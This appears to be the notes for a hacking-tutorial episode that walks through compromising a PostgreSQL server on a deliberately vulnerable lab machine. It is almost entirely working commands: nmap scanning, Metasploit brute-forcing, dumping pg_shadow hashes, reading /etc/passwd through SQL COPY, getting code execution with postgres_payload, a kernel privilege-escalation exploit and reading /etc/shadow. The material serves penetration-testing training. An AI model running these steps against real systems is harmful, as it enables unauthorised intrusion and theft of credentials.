#HackOnTuesday Episode 4 Exploiting Common PostgreSQL Vulnerabilities to Hack a Linux Server

Among the many Object-Relational DBMS (ORDBMS) out there, one of the most popular ones is PostgreSQL. PostgreSQL, often referred to as Postgres, is an open-source Object-Relational DBMS supporting almost all SQL constructs. In this episode, Gianni explains how to attack a PostgreSQL database, read and write files via SQL, use weak permissions to get code execution on the target machine, and get root by exploiting a Linux kernel vulnerability.

Tools, Scripts, and Exploits

Steps

» Identify the listening services on the target machine
   • nmap -v -sV 192.168.75.149 -p-
» Bruteforce the PostGres instance
   • msfconsole
   • use auxiliary/scanner/postgres/postgres_login
   • set RHOST 192.168.75.149
   • run
» Connect to the database and gather information
   • psql -h 192.168.75.149 -U postgres -W # password = postgres
   • SELECT VERSION();
   • SELECT usename, passwd FROM pg_shadow;
   • Test if you can read files from the system
      - CREATE TABLE myfile (input TEXT);
      - COPY myfile FROM ‘/etc/passwd’;
      - SELECT input FROM myfile;
   • Test if you can write files in /tmp
      - CREATE TABLE testfile (output TEXT);
      - INSERT INTO testfile(output) VALUES (‘test’);
      - COPY testfile(output) TO ‘/tmp/testfile’;
      - Go to Metasploitable and check if the file was created successfully
         - login with msfadmin/msfadmin
         - ls /tmp
         - cat /tmp/testfile
» Use the Metasploit’s postgres_payload module to get code execution
   • msfconsole
   • use exploit/linux/postgres/postgres_payload
   • show options
   • set RHOST 192.168.75.149
   • exploit
   • sysinfo
» Escalate to root
   • background
   • use exploit/linux/local/udev_netlink
   • show options
   • set SESSION 1
   • exploit
   • uuid
   • shell
   • whoami
   • cat /etc/shadow
» Game over!